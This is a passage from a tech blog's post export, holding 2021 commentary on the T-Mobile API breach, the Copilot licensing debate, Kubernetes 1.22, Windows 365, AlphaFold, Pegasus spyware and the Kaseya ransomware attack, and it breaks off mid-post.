2021","externalUrl":null,"permalink":"/posts/210826-python-310-structural-pattern-matching/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Python 3.10’s first release candidate introduces structural pattern matching — the most significant syntax addition since async/await, and it’s worth understanding deeply.","title":"Python 3.10 RC1 — Structural Pattern Matching Changes Everything","type":"posts"},{"content":"This week, T-Mobile confirmed what security researchers had been warning about for days: a massive data breach affecting over 40 million current, former, and prospective customers. The stolen data includes names, dates of birth, Social Security numbers, and driver\u0026rsquo;s license information — the crown jewels of personal identity. As someone who\u0026rsquo;s spent decades building systems that handle sensitive data, this one hits differently. Not because it\u0026rsquo;s the largest breach ever, but because of how it happened.\nWhat We Know So Far # The breach was first reported when a threat actor began selling data on underground forums, claiming to have obtained records of over 100 million T-Mobile customers. T-Mobile initially confirmed the breach on August 16, and the numbers have been climbing since.\nThe attacker reportedly gained access through an exposed API endpoint — an unsecured gateway that should never have been reachable from the public internet. This is not a sophisticated zero-day exploit or a novel attack vector. This is a misconfigured entry point, the kind of vulnerability that basic security hygiene should catch.\nWhat makes this particularly damning is that T-Mobile has been breached multiple times in recent years. In 2020, they disclosed a breach affecting customer data. In 2019, prepaid customer data was exposed. At some point, you have to ask whether the problem is systemic rather than incidental.\nThe API Security Epidemic # APIs have become the backbone of modern architecture. Every microservice, every mobile app, every third-party integration communicates through APIs. But our security practices haven\u0026rsquo;t kept pace with this architectural shift.\nI\u0026rsquo;ve reviewed enough systems over the years to know that API security is consistently the weakest link. Teams invest heavily in front-end security — WAFs, DDoS protection, input validation on web forms — while leaving API endpoints comparatively naked. Common issues I see repeatedly:\nNo authentication on internal APIs that are accidentally exposed externally Overly permissive CORS configurations that effectively disable cross-origin protections Missing rate limiting, allowing attackers to enumerate data at scale Verbose error messages that leak implementation details Lack of API inventory management — teams literally don\u0026rsquo;t know all the APIs they\u0026rsquo;re running The OWASP API Security Top 10, published in 2019, should be required reading for every development team. Broken Object Level Authorization (BOLA) alone accounts for a staggering number of breaches. When an API endpoint lets you access another user\u0026rsquo;s data by simply changing an ID parameter, you\u0026rsquo;ve got a BOLA vulnerability. It\u0026rsquo;s embarrassingly simple to exploit and embarrassingly common.\nWhat Should Have Been in Place # For an organization the size of T-Mobile, handling the personal data of tens of millions of people, there are baseline controls that should be non-negotiable:\nAPI Gateway with Zero Trust: Every API endpoint should sit behind a gateway that enforces authentication and authorization. No exceptions. Internal APIs should not be directly reachable from the internet — full stop. Service mesh architectures with mTLS between services aren\u0026rsquo;t just nice-to-have anymore; they\u0026rsquo;re essential.\nContinuous API Discovery: You can\u0026rsquo;t secure what you don\u0026rsquo;t know exists. Tools like Salt Security or runtime API discovery should be in the pipeline. Shadow APIs — endpoints that exist but aren\u0026rsquo;t documented — are breach vectors waiting to happen.\nData Minimization: Why did a single accessible endpoint have access to 40 million records including SSNs? The principle of least privilege applies to data access too. APIs should only return the minimum data necessary for their function, and sensitive fields should be tokenized or encrypted at the field level.\nAnomaly Detection: Exfiltrating 40 million records doesn\u0026rsquo;t happen in a single request. The volume of data access should have triggered alerts long before the full dataset was compromised. Behavioral analytics on API traffic patterns can catch these exfiltration attempts early.\nThe Regulatory Reckoning # What interests me is the regulatory dimension. We\u0026rsquo;re seeing increased scrutiny from the FTC and state attorneys general on data breaches, particularly repeat offenders. T-Mobile\u0026rsquo;s merger with Sprint came with commitments to improve cybersecurity, and this breach raises serious questions about whether those commitments are being met.\nFor those of us building systems, the regulatory landscape is shifting. CCPA enforcement is ramping up, and there\u0026rsquo;s increasing talk of federal privacy legislation. The days of treating data breaches as a cost of doing business are numbered.\nMy Take # I\u0026rsquo;ve been building and securing systems since before APIs were a thing, back when SOAP was considered cutting-edge. The fundamental lesson hasn\u0026rsquo;t changed in thirty years: security is not a feature you bolt on after deployment. It\u0026rsquo;s an architectural concern that needs to be addressed from the first design conversation.\nThe T-Mobile breach is frustrating because it was preventable. Not with exotic technology or massive security budgets, but with basic discipline: know your attack surface, authenticate every endpoint, monitor for anomalies, minimize data exposure.\nIf you\u0026rsquo;re reading this and thinking \u0026ldquo;our API security is probably fine\u0026rdquo; — it\u0026rsquo;s probably not. Run an API security audit this quarter. Map your endpoints. Check your authentication. Look for shadow APIs. The next T-Mobile-scale breach is already being set up by an overlooked, unauthenticated API sitting on some forgotten server in someone\u0026rsquo;s cloud account.\nDon\u0026rsquo;t let it be yours.\n","date":"19 August 2021","externalUrl":null,"permalink":"/posts/210819-tmobile-data-breach-api-security/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"The T-Mobile breach exposing 40+ million records highlights systemic failures in API security and data protection that the entire industry needs to address.","title":"T-Mobile's Massive Data Breach — A Wake-Up Call for API Security","type":"posts"},{"content":"It\u0026rsquo;s been about six weeks since GitHub launched Copilot in technical preview, and the initial excitement has given way to a more heated conversation. The AI pair programmer, built on OpenAI\u0026rsquo;s Codex model, can generate surprisingly competent code from natural language prompts and context. But the open source community is increasingly asking an uncomfortable question: is Copilot built on a foundation of licensing violations?\nThe debate has been simmering across GitHub Issues, Twitter threads, Hacker News, and mailing lists, and it touches on fundamental questions about how we think about code, copyright, and the training data that powers machine learning models.\nHow Copilot Works (And Why It Matters) # Copilot is powered by OpenAI Codex, a descendant of GPT-3 that\u0026rsquo;s been fine-tuned on publicly available code — primarily from GitHub\u0026rsquo;s own repositories. When you type a comment or start writing a function, Copilot predicts what you\u0026rsquo;re likely to write next, offering multi-line suggestions that can range from boilerplate to surprisingly sophisticated implementations.\nThe technical achievement is impressive. In my own testing during the preview, Copilot correctly generated working implementations for common patterns in Python and JavaScript, often needing only a function name and docstring as input. The evolution of Copilot capabilities would eventually extend far beyond code completion. It handles API calls, data transformations, and algorithmic patterns with reasonable accuracy.\nBut here\u0026rsquo;s where it gets complicated: the model was trained on code from public GitHub repositories. Those repositories carry licences — GPL, MIT, Apache, BSD, and many others. Each licence comes with specific obligations about how the code can be used, modified, and redistributed. The question is whether training an ML model on that code, and then reproducing patterns from it in suggestions, constitutes a use that\u0026rsquo;s governed by those licences.\nThe Licensing Argument # The Free Software Foundation has raised concerns about Copilot\u0026rsquo;s relationship with copyleft licences like the GPL. Similar concerns would resurface around open source governance as AI-generated content proliferated. The GPL requires that derivative works also be released under the GPL. If Copilot has learned patterns from GPL-licensed code and suggests those patterns to users who incorporate them into proprietary software, is that a GPL violation?\nThere are reasonable arguments on both sides:\nThe \u0026ldquo;it\u0026rsquo;s fair use\u0026rdquo; position: Training an ML model on publicly available code is a transformative use. The model doesn\u0026rsquo;t store or reproduce code verbatim — it learns statistical patterns and generates new code based on those patterns. This is analogous to a developer reading open source code to learn patterns and then writing similar code in their own projects.\nThe \u0026ldquo;it\u0026rsquo;s a laundering machine\u0026rdquo; position: Copilot has been demonstrated to reproduce substantial portions of code verbatim in some cases, including recognizable snippets from well-known projects — sometimes complete with original comments. If the model can reproduce exact code from training data, it\u0026rsquo;s not just learning patterns; it\u0026rsquo;s memorising and regurgitating copyrighted material, potentially stripping licence attributions in the process.\nThe truth likely sits somewhere in between, and current copyright law isn\u0026rsquo;t well-equipped to adjudicate the question. The concept of \u0026ldquo;fair use\u0026rdquo; in the context of ML training data is largely untested in courts, at least with respect to code.\nThe Consent Problem # Beyond the legal question, there\u0026rsquo;s an ethical dimension that resonates with me more strongly. Many open source developers chose specific licences deliberately. A developer who licences their code under the GPL is making a philosophical statement: this code should remain free and open. A developer who chooses MIT is saying something different: use this however you want, just keep the attribution.\nNeither of those developers explicitly consented to their code being used as training data for a commercial AI product. GitHub\u0026rsquo;s Terms of Service do grant certain rights to GitHub regarding hosted content, but the interpretation of whether those rights extend to ML training is contested. Supply chain security in open source would continue to raise similar trust concerns.\nThis is particularly pointed because GitHub is owned by Microsoft, and Copilot is a paid product (currently free in preview, but pricing is coming). The commercialization of AI-assisted development would accelerate rapidly in subsequent years. Open source developers contributed their code freely, and a commercial entity is now using that collective work to build a revenue-generating service. Even if it\u0026rsquo;s legally permissible, the optics are troubling for a company that positions itself as a champion of open source.\nPractical Implications for Developers # If you\u0026rsquo;re using Copilot in the technical preview, here are some practical considerations. Frameworks for responsible AI development would eventually address these licensing and consent questions at a regulatory level.\nReview suggestions carefully: Don\u0026rsquo;t blindly accept Copilot\u0026rsquo;s output. Beyond the licensing question, there are quality and security concerns. The model can suggest code with bugs, vulnerabilities, or anti-patterns.\nBe aware of verbatim reproduction: If a suggestion looks too specific or includes unusual variable names and comments, it may be a near-verbatim reproduction of training data. Consider searching for that code on GitHub to check.\nUnderstand your project\u0026rsquo;s licence obligations: If you\u0026rsquo;re working on a permissively licensed project, the risk is lower. If you\u0026rsquo;re working on proprietary code, accepting GPL-derived suggestions could create compliance issues.\nKeep an eye on the legal landscape: This is an evolving situation. The Software Freedom Conservancy and others are actively researching the legal dimensions. Court cases or regulatory guidance could change the picture significantly.\nMy Take # I\u0026rsquo;ve been writing and using open source software for most of my career, and I have mixed feelings about Copilot. The technology is genuinely useful — it accelerates boilerplate coding and can help developers explore unfamiliar APIs. As a productivity tool, it\u0026rsquo;s impressive.\nBut I\u0026rsquo;m uncomfortable with the training data approach. The open source ecosystem is built on a social contract: developers share their work under specific terms, and users respect those terms. Using that collective output as training data for a commercial product without explicit consent feels like it bends, if not breaks, that social contract.\nI don\u0026rsquo;t think the answer is to stop building AI coding tools — the genie isn\u0026rsquo;t going back in the bottle. But I\u0026rsquo;d like to see more transparency from GitHub and OpenAI about the training data, better mechanisms for developers to opt out of training, and serious engagement with the licensing questions rather than hand-waving about fair use.\nThe open source community built the platform that Copilot stands on. The least GitHub can do is address that community\u0026rsquo;s concerns with the seriousness they deserve. This conversation is far from over, and how it\u0026rsquo;s resolved will set important precedents for the intersection of AI and open source for years to come.\n","date":"12 August 2021","externalUrl":null,"permalink":"/posts/210812-github-copilot-open-source-debate/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"GitHub Copilot’s AI-powered code suggestions have sparked a fierce debate about open source licensing, training data consent, and the future of code ownership.","title":"GitHub Copilot and the Open Source Licensing Firestorm","type":"posts"},{"content":"Kubernetes 1.22 landed this week, and it\u0026rsquo;s one of the most significant releases in recent memory — not because of flashy new features, but because of what it removes. This release drops a large batch of deprecated beta APIs that have been hanging around for years, and it graduates several important features to stable. The support window improvements that began with Kubernetes 1.19 had set the stage for more aggressive API cleanup. For those of us running Kubernetes in production, this is the release that demands attention.\nThe Great API Cleanup # The headline change is the removal of several beta API versions that have long been superseded by stable equivalents. Specifically, Kubernetes 1.22 removes:\nIngress beta APIs (extensions/v1beta1 and networking.k8s.io/v1beta1) — replaced by networking.k8s.io/v1 (stable since 1.19) CustomResourceDefinition beta APIs (apiextensions.k8s.io/v1beta1) — replaced by apiextensions.k8s.io/v1 (stable since 1.16) ValidatingWebhookConfiguration and MutatingWebhookConfiguration beta APIs — stable equivalents available since 1.16 CertificateSigningRequest beta APIs — stable since 1.19 Several other beta resources in the rbac.authorization.k8s.io/v1beta1 group If you\u0026rsquo;re thinking \u0026ldquo;we should have migrated off those ages ago\u0026rdquo; — you\u0026rsquo;re right. These deprecations were announced one to two years ago, with the stable replacements available even longer. But I\u0026rsquo;ve seen enough production clusters to know that many teams are still running manifests with extensions/v1beta1 Ingress resources because, well, they worked and nobody prioritised the migration.\nThose teams are about to have a bad day if they upgrade without preparation. Later Kubernetes releases continued this disciplined API cleanup, maturing the platform further.\nHow to Prepare # Before upgrading to 1.22, you need to audit your cluster. The Kubernetes project has made this relatively straightforward. Modern Kubernetes operations emphasize automation over manual migrations.\nUse kubectl convert: This plugin can convert manifests between API versions. Run it against your stored YAML files to identify what needs updating.\nCheck the API deprecation guide: The official deprecation guide lists every removed API with its replacement.\nAudit with kubectl get --raw: Query the API discovery endpoints to see which API versions your workloads are actually using.\nWatch audit logs: If you\u0026rsquo;ve enabled audit logging, search for requests to deprecated API endpoints. This reveals which controllers, operators, and CI/CD pipelines are still using old APIs.\nTest with --warnings-as-errors: Recent kubectl versions surface deprecation warnings. Treat these as errors in your CI pipeline to catch issues before they hit production.\nThe critical thing many people miss: it\u0026rsquo;s not just your own manifests that matter. Helm charts, operators, and third-party controllers may also reference deprecated APIs. Check that your installed operators are compatible with 1.22 before upgrading. Operator maturity and standardization improved significantly as the ecosystem consolidated. The Helm mapkubeapis plugin can help update stored Helm release metadata.\nFeatures Graduating to Stable # The evolution of Kubernetes APIs toward stability is a sign of the platform\u0026rsquo;s maturation.\nBeyond the removals, 1.22 promotes several features to GA (Generally Available):\nServer-Side Apply reaches GA after a long beta. This is significant — it moves apply logic from kubectl to the API server, enabling proper field-level ownership tracking. If you\u0026rsquo;ve ever had two controllers fighting over the same resource fields, Server-Side Apply is the solution. It tracks which manager owns which fields and prevents conflicts.\nExternal Credential Providers graduate to stable, allowing kubectl to authenticate using external credential systems. This is essential for enterprise environments using custom identity providers.\nBound Service Account Token Volumes reach GA, replacing the old non-expiring service account tokens with time-bound, audience-bound tokens. This is a meaningful security improvement — the old tokens were essentially permanent credentials that never expired and could be used against any audience.\nPodDisruptionBudget graduates its policy/v1 API to stable, though the policy/v1beta1 version is deprecated (not yet removed).\nThe Maturity Signal # What I find most interesting about 1.22 is what it signals about Kubernetes\u0026rsquo; maturity. A project that aggressively removes deprecated APIs is a project that\u0026rsquo;s confident in its stable interfaces. The Kubernetes API deprecation policy — at least three releases of overlap for beta-to-GA transitions — gives users reasonable migration windows.\nCompare this to the early days of Kubernetes (I remember running 1.4 and 1.5 in production) when breaking changes between minor versions were common and often poorly documented. The project has come a long way in API governance.\nThis maturity also means that the \u0026ldquo;upgrade every release\u0026rdquo; cadence is becoming more important, not less. With the support window at roughly 14 months (three minor versions), and deprecated APIs being removed on schedule, falling behind means accumulating migration debt that compounds with each skipped release.\nMy Take # I\u0026rsquo;ve been running Kubernetes in production environments since before it hit 1.0, and 1.22 feels like a watershed moment. The project is choosing long-term API cleanliness over short-term convenience, and that\u0026rsquo;s the right call.\nMy advice for teams: don\u0026rsquo;t skip this upgrade, but don\u0026rsquo;t rush it either. Spend a week auditing your manifests, Helm charts, and operators against the API migration guide. Set up a staging cluster running 1.22 and deploy your full stack against it. Fix the breakages there, not in production.\nAnd if this upgrade is painful for your team, take it as a signal to invest in your upgrade processes. Kubernetes isn\u0026rsquo;t slowing down its release cadence, and the API deprecation cycle will continue. The teams that treat Kubernetes upgrades as routine maintenance rather than a quarterly fire drill are the ones that sleep well at night.\nFifty-three enhancements in one release — thirteen graduating to stable, twenty-four in beta, and sixteen entering alpha. The Kubernetes train keeps moving, and 1.22 is a reminder to stay on board.\n","date":"5 August 2021","externalUrl":null,"permalink":"/posts/210805-kubernetes-1-22-release/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Kubernetes 1.22 drops several long-deprecated beta APIs and graduates key features to stable — a sign the project is maturing and cleaning house.","title":"Kubernetes 1.22 — Removing the Training Wheels","type":"posts"},{"content":"Microsoft just unveiled Windows 365, a service that streams a full Windows desktop from Azure to any device with a web browser. Set to launch on August 2nd, it promises a \u0026ldquo;Cloud PC\u0026rdquo; — a persistent, personalised Windows instance running in the cloud. If you\u0026rsquo;ve worked with Azure Virtual Desktop (formerly Windows Virtual Desktop), this is its consumer-friendly sibling. And as someone who\u0026rsquo;s managed developer environments across distributed teams, I think this could be more significant than it initially appears.\nWhat Windows 365 Actually Is # Let\u0026rsquo;s be precise about what Microsoft is offering. Windows 365 is a Desktop-as-a-Service (DaaS) product built on top of Azure infrastructure. Each user gets a dedicated virtual machine running Windows 10 (with Windows 11 coming later) that persists between sessions. Your files, apps, and settings stay exactly where you left them.\nThe key differentiator from existing Azure Virtual Desktop (AVD) is simplicity. AVD requires IT administrators to manage host pools, session hosts, scaling plans, and image management. Windows 365 abstracts all of that away — you pick a configuration (CPU, RAM, storage), assign it to a user, and they get a Cloud PC. Microsoft handles the infrastructure, patching, and availability.\nPricing tiers range from basic configurations (2 vCPU, 4GB RAM, 64GB storage) suitable for lightweight productivity work, up to more capable setups (8 vCPU, 32GB RAM, 512GB storage) that could handle development workloads. Per-user, per-month pricing — no variable compute costs to worry about.\nThe Developer Workstation Question # What interests me most is the implications for developer environments. I\u0026rsquo;ve spent years wrestling with the \u0026ldquo;works on my machine\u0026rdquo; problem, and cloud-based development environments have been slowly gaining traction. GitHub Codespaces, Gitpod, and JetBrains\u0026rsquo; upcoming remote development features all point in this direction.\nWindows 365 takes a different approach. Rather than providing a specialised development environment, it offers a full desktop. This means you could run Visual Studio (not just VS Code), local Docker instances, database tools, and anything else your workflow requires — all in the cloud.\nFor distributed teams, the advantages are compelling:\nOnboarding: New developers get a pre-configured Cloud PC instead of spending two days setting up their local machine Security: Source code never leaves the cloud. You can enforce network policies at the Azure level Hardware independence: Your developers can use any device — a thin client, a Chromebook, even a tablet — and still access a full development environment Consistency: Every team member works on an identical base configuration The latency question is the elephant in the room, of course. Azure Virtual Desktop uses the RDP protocol with optimisations like Shortpath for managed networks. For text-heavy development work (writing code, running terminal commands), the latency is manageable on decent connections. For GPU-intensive work or scenarios requiring precise mouse input, the experience still lags behind local hardware.\nHow This Compares to the Competition # Microsoft isn\u0026rsquo;t the first to market here. Amazon WorkSpaces has offered virtual desktops since 2014. Citrix has been doing this for even longer. And on the developer-specific side, the aforementioned Codespaces and Gitpod offer more targeted solutions.\nWhat Microsoft brings is integration depth. Windows 365 ties into Microsoft Endpoint Manager for device management, Azure Active Directory for identity, and Microsoft 365 for productivity apps. If your organisation is already in the Microsoft ecosystem — and a staggering number of enterprises are — the adoption friction is minimal.\nThe pricing will be the make-or-break factor. At the high end, a capable Cloud PC costs more per month than financing equivalent local hardware. But that calculation ignores IT management overhead, security benefits, and the flexibility to scale configurations up or down. For enterprises with compliance requirements that mandate centralised data control, the premium may be easily justified.\nInfrastructure Implications # From an infrastructure perspective, Windows 365 represents a broader trend I\u0026rsquo;ve been watching: the steady migration of traditionally local compute to cloud-managed services. We\u0026rsquo;ve already moved our servers, our CI/CD pipelines, our databases, and increasingly our development environments to the cloud. The end-user desktop was one of the last holdouts.\nThe sustainability of this model depends on network infrastructure. Microsoft is betting that broadband connectivity is now reliable enough for real-time desktop streaming. In many urban and suburban areas, that\u0026rsquo;s true. In rural areas or developing regions, it\u0026rsquo;s not — creating a potential digital divide in workplace tooling.\nThere\u0026rsquo;s also the question of offline capability. A Cloud PC is useless without an internet connection. Microsoft hasn\u0026rsquo;t announced any offline sync features, which limits applicability for developers who work on planes, trains, or in areas with spotty connectivity. This is a gap that local development environments don\u0026rsquo;t have.\nMy Take # I\u0026rsquo;ve been managing developer environments since before virtualisation was mainstream, and I\u0026rsquo;ve watched the pendulum swing between thin clients and fat clients multiple times. Windows 365 feels like the most credible thin-client push yet, primarily because the underlying cloud infrastructure and network connectivity have finally caught up to the vision.\nWill I be recommending it for developer teams right now? Probably not as a primary workstation — the latency overhead and offline limitations are real constraints for intensive development work. But as a secondary environment for accessing corporate resources, testing in Windows-specific configurations, or providing secure access to sensitive codebases? Absolutely.\nThe more interesting question is where this goes in two to three years. If Microsoft can get latency down to imperceptible levels and add GPU-backed configurations at reasonable prices, the case for local development hardware weakens considerably. We\u0026rsquo;re not there yet, but the trajectory is clear.\nFor now, Windows 365 is a solid v1 product that will find immediate traction in enterprise IT departments. For developers, keep an eye on this space — the cloud desktop isn\u0026rsquo;t just for spreadsheet jockeys anymore.\n","date":"29 July 2021","externalUrl":null,"permalink":"/posts/210729-windows-365-cloud-pc-future/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Microsoft announces Windows 365, a full Cloud PC experience — and it might reshape how we think about developer workstations and enterprise IT.","title":"Windows 365 Cloud PC — Microsoft's Bet on the Desktop-as-a-Service Future","type":"posts"},{"content":"In a week where it\u0026rsquo;s easy to be cynical about AI hype, DeepMind has given us something genuinely remarkable. They\u0026rsquo;ve released the AlphaFold Protein Structure Database in partnership with EMBL-EBI, providing predicted 3D structures for over 350,000 proteins — including nearly the entire human proteome. This isn\u0026rsquo;t a demo, a benchmark, or a press release. It\u0026rsquo;s a production-quality scientific resource, and it\u0026rsquo;s free.\nAs someone who\u0026rsquo;s spent most of my career in software rather than biology, I\u0026rsquo;m not going to pretend I fully grasp the protein folding problem\u0026rsquo;s biochemistry. But I do understand what it means when a computational approach solves a problem that experimental methods have been grinding at for 50 years, and then gives away the results.\nThe Technical Achievement # Protein structure prediction has been the holy grail of computational biology since Anfinsen\u0026rsquo;s 1973 Nobel Prize demonstrated that amino acid sequences determine protein shape. The problem: there are an astronomical number of possible configurations for even a small protein, and simulating the physics takes enormous computational resources.\nAlphaFold 2, which dominated the CASP14 competition last December, approaches this differently. Rather than simulating physics, it uses a deep learning architecture that combines:\nMultiple sequence alignments (MSAs) to capture evolutionary relationships between proteins An attention-based neural network (the \u0026ldquo;Evoformer\u0026rdquo;) that reasons about spatial and evolutionary relationships simultaneously A structure module that directly predicts 3D atomic coordinates The model achieves accuracy competitive with experimental methods like X-ray crystallography for many proteins — but in minutes rather than months or years. The median accuracy across the human proteome predictions is remarkably high, with confidence scores that let researchers know which predictions to trust.\nWhy Open Matters # What elevates this from \u0026ldquo;impressive research\u0026rdquo; to \u0026ldquo;genuinely transformative\u0026rdquo; is the decision to release everything openly. The AlphaFold source code is available on GitHub under an Apache 2.0 licence. The database is freely accessible through EMBL-EBI. DeepMind plans to expand coverage to 100 million proteins — essentially every known protein sequence.\nI\u0026rsquo;ve worked on enough proprietary systems to appreciate what this means. DeepMind could have built a commercial platform, charged for API access, or created a gated research portal. Instead, they\u0026rsquo;ve created a public good. Researchers at underfunded universities in developing countries have the same access as labs at Harvard or Oxford.\nThis is particularly noteworthy given the broader AI industry\u0026rsquo;s trend toward closed models and proprietary training data. DeepMind is showing that open release of both models and predictions can coexist with a viable business (albeit one bankrolled by Alphabet\u0026rsquo;s deep pockets).\nThe Software Engineering Angle # From a pure engineering perspective, the AlphaFold system is fascinating. The inference pipeline requires significant GPU resources — you\u0026rsquo;ll need at least an A100 or equivalent to run predictions locally. But the team has made thoughtful engineering choices:\nJackhmmer and HHblits for sequence alignment, leveraging established bioinformatics tools rather than reinventing the wheel JAX as the deep learning framework, which enables efficient compilation and parallelisation A well-structured codebase that separates data processing, model architecture, and inference logic For ML engineers, the architecture paper (published in Nature) is worth reading regardless of your domain. The \u0026ldquo;recycling\u0026rdquo; mechanism — where the model iteratively refines its predictions by feeding outputs back as inputs — is an elegant approach that\u0026rsquo;s applicable beyond protein folding.\nThe database infrastructure itself is built on standard bioinformatics tools and formats (mmCIF files, PDB format), which means it slots directly into existing scientific workflows. Good engineering isn\u0026rsquo;t just about the model — it\u0026rsquo;s about making the outputs actually usable.\nWhat This Means for AI\u0026rsquo;s Credibility # I\u0026rsquo;ll be honest: I\u0026rsquo;ve grown weary of AI announcements that amount to \u0026ldquo;we beat a benchmark\u0026rdquo; or \u0026ldquo;our chatbot sounds slightly more human.\u0026rdquo; The gap between AI research results and real-world impact has been a persistent frustration.\nAlphaFold is different. Structural biologists are already using these predictions to guide experiments, understand disease mechanisms, and design potential drug candidates. The database had thousands of accesses within hours of launch. This is AI solving a real problem that matters to people beyond the machine learning community.\nIt also demonstrates something important about where deep learning actually excels: problems with vast amounts of structured training data (protein sequences and known structures), clear evaluation metrics (does the predicted structure match reality?), and well-defined inputs and outputs. These are the conditions under which current AI approaches genuinely shine.\nMy Take # In three decades of watching technology trends, I\u0026rsquo;ve learned to distinguish between demos and deployments. AlphaFold\u0026rsquo;s protein database is a deployment. It\u0026rsquo;s not perfect — some predictions have low confidence, membrane proteins remain challenging, and the model predicts static structures rather than the dynamic conformations proteins actually adopt. But it\u0026rsquo;s useful right now, for real scientists, solving real problems.\nFor those of us in the software world, there\u0026rsquo;s an inspiring lesson here about what happens when you combine genuine technical excellence with a commitment to open access. DeepMind didn\u0026rsquo;t just train a model — they built a database, wrote documentation, partnered with domain experts at EMBL-EBI, and released code that other researchers can run and improve.\nThat\u0026rsquo;s the standard I wish more AI projects would aim for. Not just impressive results on a leaderboard, but a usable resource that advances an entire field. This is one of those weeks where the hype is actually justified.\n","date":"22 July 2021","externalUrl":null,"permalink":"/posts/210722-alphafold-protein-database-ai-science/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"DeepMind releases 350,000 protein structure predictions as an open database — a rare moment where AI genuinely accelerates scientific progress.","title":"AlphaFold's Protein Database — When AI Delivers on the Hype","type":"posts"},{"content":"This week, a consortium of journalists published the Pegasus Project, exposing how NSO Group\u0026rsquo;s Pegasus spyware has been deployed against journalists, activists, and political figures worldwide. The technical details emerging from Amnesty International\u0026rsquo;s forensic methodology report are staggering — and as someone who\u0026rsquo;s spent decades thinking about software security, I find the implications deeply troubling.\nWhat Makes Pegasus Different # Pegasus isn\u0026rsquo;t your average piece of malware. It leverages zero-click exploits, meaning the target doesn\u0026rsquo;t need to open a link, download a file, or take any action at all. A specially crafted iMessage, for instance, can compromise an iPhone without the recipient ever interacting with it.\nThe attack chain reportedly exploits vulnerabilities in Apple\u0026rsquo;s iMessage processing pipeline — specifically how the system handles certain file formats before they\u0026rsquo;re even rendered to the user. This is a fundamentally different threat model from traditional phishing attacks. You can\u0026rsquo;t train users to avoid something they never see.\nFrom Amnesty International\u0026rsquo;s technical forensic methodology, the spyware can extract messages, emails, photos, record calls, and silently activate microphones and cameras. It operates across both iOS and Android with platform-specific exploit chains.\nThe Zero-Click Problem # What keeps me up at night about zero-click exploits isn\u0026rsquo;t just Pegasus — it\u0026rsquo;s the architectural pattern they expose. Modern messaging apps perform complex parsing of rich media formats before any user interaction. This creates an enormous attack surface that exists purely by design.\nConsider the chain: a message arrives, the OS processes it, the app parses the content type, renderers decode the payload — all before a single pixel appears on screen. Each step involves complex C/C++ code processing untrusted input. For an attacker with enough resources, this is a goldmine.\nApple\u0026rsquo;s BlastDoor sandbox, introduced in iOS 14, was supposed to mitigate exactly this class of attack by isolating message parsing. The fact that Pegasus apparently found ways around it tells you something about the difficulty of securing these pipelines. You can add layers of sandboxing, but sufficiently motivated attackers with nation-state budgets will find seams.\nSupply Chain Trust in a Post-Pegasus World # The broader question for our industry is about trust in the software supply chain. NSO Group sells Pegasus exclusively to governments, ostensibly for counter-terrorism and law enforcement. But the leaked list of 50,000+ phone numbers suggests the tool is being used far beyond those narrow justifications.\nThis creates an uncomfortable dynamic for software vendors. Every vulnerability you ship isn\u0026rsquo;t just a bug — it\u0026rsquo;s potential ammunition for surveillance vendors. The market for zero-day exploits is thriving, and companies like NSO Group, Candiru, and others are willing to pay millions for reliable exploit chains.\nFor those of us building software, this reinforces something I\u0026rsquo;ve been saying for years: security isn\u0026rsquo;t a feature you bolt on. It\u0026rsquo;s an architectural property. Memory-safe languages, minimal attack surfaces, principle of least privilege — these aren\u0026rsquo;t academic niceties. They\u0026rsquo;re defences against adversaries with essentially unlimited budgets.\nWhat Developers Should Take Away # If you\u0026rsquo;re building applications that process untrusted input — and nearly all of us are — the Pegasus revelations should sharpen your thinking:\nReduce parser complexity: Every format you support is attack surface. Do you really need to render that obscure image format client-side?\nSandbox aggressively: Process untrusted data in isolated contexts with minimal permissions. Even if parsing is exploited, limit what an attacker can reach.\nMemory safety matters: A significant portion of zero-click exploits target memory corruption bugs. Languages like Rust eliminate entire classes of these vulnerabilities. The argument for memory-safe languages in security-critical code just got stronger.\nAssume compromise: Design systems where a single compromised component can\u0026rsquo;t exfiltrate everything. Compartmentalise data access.\nMy Take # I\u0026rsquo;ve been in this industry long enough to remember when \u0026ldquo;nation-state adversary\u0026rdquo; was considered an unrealistic threat model for most software. Pegasus demonstrates that the tools of nation-state surveillance have been productised and sold to dozens of governments worldwide. The adversary isn\u0026rsquo;t hypothetical anymore.\nWhat frustrates me most is the asymmetry. NSO Group reportedly has hundreds of engineers working on exploitation. Most development teams I\u0026rsquo;ve worked with have maybe one part-time person thinking about security. The economics are wildly skewed in the attacker\u0026rsquo;s favour.\nThe silver lining, if there is one, is that this kind of exposure tends to accelerate defensive investment. Apple will undoubtedly harden iMessage further. Google will tighten Android\u0026rsquo;s messaging stack. But the fundamental tension remains: we build complex systems that process untrusted input, and sophisticated attackers will always find the cracks.\nFor those of us shipping software every day, the lesson is clear — every line of parsing code you write is a potential entry point. Treat it accordingly.\n","date":"15 July 2021","externalUrl":null,"permalink":"/posts/210715-pegasus-spyware-zero-click-exploits/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"The Pegasus Project revelations expose industrial-grade zero-click exploits targeting journalists and activists — and raise uncomfortable questions about software supply chains.","title":"Pegasus Spyware — Zero-Click Exploits and What They Mean for Software Security","type":"posts"},{"content":"Last Friday — the Friday before the Fourth of July weekend, because attackers have impeccable timing — the REvil ransomware group launched what may be the most impactful supply chain attack we\u0026rsquo;ve seen yet. By exploiting vulnerabilities in Kaseya\u0026rsquo;s VSA remote monitoring and management platform, they managed to push ransomware to an estimated 1,500 businesses across at least 17 countries. The ransom demand? $70 million in Bitcoin for a universal decryptor.\nIf the SolarWinds attack was a precision strike aimed at high-value espionage targets, Kaseya is a carpet bombing — hitting as many victims as possible through a single point of leverage. And the leverage point they chose reveals a deeply uncomfortable truth about how managed service providers operate.\nThe Attack Vector # Kaseya VSA is a remote monitoring and management (RMM) tool used primarily by managed service providers (MSPs) — companies that handle IT infrastructure for small and medium businesses that don\u0026rsquo;t have their own IT departments. An MSP might manage hundreds of client organizations through a single VSA instance.\nThe attackers exploited zero-day vulnerabilities in the VSA server software — specifically, an authentication bypass and subsequent code execution chain. Because VSA is designed to push software updates and patches to managed endpoints, the ransomware was delivered through the exact mechanism that\u0026rsquo;s supposed to keep those endpoints secure. The irony is painful.\nThe attack chain was elegant in its simplicity: compromise the VSA server, use its legitimate update distribution mechanism to push the REvil 